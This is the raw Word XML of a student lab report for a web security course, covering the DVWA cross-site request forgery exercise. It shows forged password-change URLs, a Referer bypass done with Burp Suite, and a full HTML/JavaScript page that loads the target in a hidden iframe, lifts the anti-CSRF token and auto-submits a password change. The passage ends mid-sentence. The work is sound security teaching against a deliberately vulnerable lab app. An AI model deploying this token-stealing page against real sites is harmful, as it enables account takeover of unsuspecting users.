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20" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/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>实验报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>课程：《web应用安全》</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44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b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44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b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44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b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>班级：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网安2202</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>学号：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3220812128</w:t>
      </w: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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>姓名：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章百琪</w:t>
      </w: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实验名称：实验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8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>（ DVWA-CSRF跨站请求伪造）</w:t>
      </w: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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>日期：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2024.5.26</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:ind w:left="360" w:leftChars="0" w:firstLine="640" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="640" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="640" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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实验内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>级别：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查看源代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="2202180"/>
            <wp:effectExtent l="0" t="0" r="8890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ind w:firstLine="550" w:firstLineChars="250"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$GLOBALS ：引用全局作用域中可用的全部变量。$GLOBALS 这种全局变量用于在 PHP 脚本中的任意位置访问全局变量（从函数或方法中均可）。PHP 在名为 $GLOBALS[index] 的数组中存储了所有全局变量。变量的名字就是数组的键。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:firstLine="440" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从源代码可以看出这里只是对用户输入的两个密码进行判断，看是否相等。不相等就提示密码不匹配。相等的话，查看有没有设置数据库连接的全局变量和其是否为一个对象。如果是的话，用mysqli_real_escape_string（）函数去转义一些字符，如果不是的话输出错误。是同一个对象的话，再用md5进行加密，再更新数据库。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>（1）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一次尝试两次秘密不一致，结果：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可以看到顶部的URL是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>http://localhost/DVWA/vulnerabilities/csrf/?password_new=password&amp;password_conf=123456&amp;Change=Change#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显示这就是修改密码的链接。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>（2）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开另一个页面，在顶部URL中两个原密码处输入自己想修改的新密码，回车后结果：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>http://localhost/DVWA/vulnerabilities/csrf/?password_new=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&amp;password_conf=123456&amp;Change=Change#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到，直接跳转到了密码成功的页面了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3873500" cy="3028950"/>
            <wp:effectExtent l="0" t="0" r="0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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Middle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>级别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查看源代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2240915"/>
            <wp:effectExtent l="0" t="0" r="3810" b="698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ind w:firstLine="440" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Middle类型的代码在Low级别的基础上，加上了对用户请求头的中的Referer字段进行验证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 </w:t>
      </w:r>
      <w:r>
        <w:t>if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false )</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即用户的请求头中的Referer字段必须包含了服务器的名字。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>（1）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开另一个页面，在顶部URL中自己输入自己想修改的密码，结果显示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>http://localhost/DVWA/vulnerabilities/csrf/?password_new=123456&amp;password_conf=123456&amp;Change=Change#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="2626995"/>
            <wp:effectExtent l="0" t="0" r="7620" b="190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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>（2）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先正常访问这个链接，然后用burpsuite进行抓包，如图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2966085"/>
            <wp:effectExtent l="0" t="0" r="10160" b="571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hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>（3）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开另一个页面，在顶部URL中两处输入自己想修改的密码值，运行后用burpsuite进行抓包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>localhost/DVWA/vulnerabilities/csrf/?password_new=123456&amp;password_conf=123456&amp;Change=Change#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2966085"/>
            <wp:effectExtent l="0" t="0" r="10160" b="571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ind w:firstLine="550" w:firstLineChars="250"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对比（2）、（3）步骤中的两个抓包结果，发现（3）的请求包的头中并没有Referer字段，所以不能修改成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:firstLine="440" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制（2）中的包的Referer行的内容到（3）的包中，放行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:firstLine="330" w:firstLineChars="150"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4064000" cy="4070350"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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ind w:firstLine="330" w:firstLineChars="150"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="2626995"/>
            <wp:effectExtent l="0" t="0" r="7620" b="190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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:firstLine="330" w:firstLineChars="150"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到，密码修改成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>级别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查看源代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="2258695"/>
            <wp:effectExtent l="0" t="0" r="11430" b="190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ind w:firstLine="440" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>High级别的代码加入了Anti-CSRF token机制，用户每次访问改密页面时，服务器都会返回一个随机的token，当浏览器向服务器发起请求时，需要提交token参数，而服务器在收到请求时，会优先检查token，只有token正确，才会处理客户端的请求。这里因为对请求的token进行了验证，所以比上两个等级的更加的安全。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:firstLine="440" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为该请求是get请求，所以token验证会被放在请求URL中，我们随便输入密码验证一下，可以看到，在请求的URL中最末尾加入了token。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:firstLine="440" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以现在要想进行CSRF攻击就必须获取到用户的token，而要想获取到 token 就必须利用用户的 cookie 值去访问修改密码的页面，然后截取服务器返回的token值。然后再利用CSRF漏洞构造URL进行密码的修改。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:firstLine="440" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们尝试利用下面的代码去构造一个页面，诱使用户点击，当用户点击该链接的这一刻，该代码会偷偷的访问修改用户密码的页面，然后获取到服务器返回的 token ，然后再构造修改密码的表单，加上我们获取到服务器的token值，向服务器发送修改密码的请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;head lang="en"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;title&gt;&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;script type="text/javascript"&gt;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 xml:space="preserve">        //获取用户的token，并设置为表单中的token，然后提交修改密码的表单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        function attack()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            document.getElementById("transfer").submit();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;body οnlοad="attack()"&gt;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 xml:space="preserve">    &lt;iframe src="http://192.168.10.14/dvwa/vulnerabilities/csrf/" id="hack"  style="display:none;"&gt;  &lt;!--在该网页内打开另一个网页--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;form method="GET" id="transfer"  action="http://192.168.10.14/dvwa/vulnerabilities/csrf/"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;input type="hidden" name="password_new" value="admin"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;input type="hidden" name="password_conf" value="admin"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;input type="hidden" name="user_token" value=""&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;input type="hidden" name="Change" value="Change"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:firstLine="330" w:firstLineChars="150"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码中框架ifame要访问的链接是 </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://192.168.10.14/dvwa/vulnerabilities/csrf" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://192.168.10.14/dvwa/vulnerabilities/csrf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
